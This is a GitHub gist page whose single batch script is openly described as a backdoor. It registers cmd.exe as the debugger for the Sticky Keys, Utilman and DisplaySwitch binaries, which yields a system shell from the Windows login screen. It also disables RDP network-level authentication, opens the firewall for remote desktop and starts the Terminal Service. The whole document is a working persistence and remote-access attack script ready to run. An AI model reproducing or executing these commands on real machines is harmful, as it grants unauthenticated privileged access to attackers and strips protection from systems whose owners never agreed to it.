Last active
September 9, 2022 10:17
-
-
Save ahhh/c9db63033ac89734b72c to your computer and use it in GitHub Desktop.
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f | |
netsh firewall set service type = remotedesktop mode = enable | |
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | |
net start TermService |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment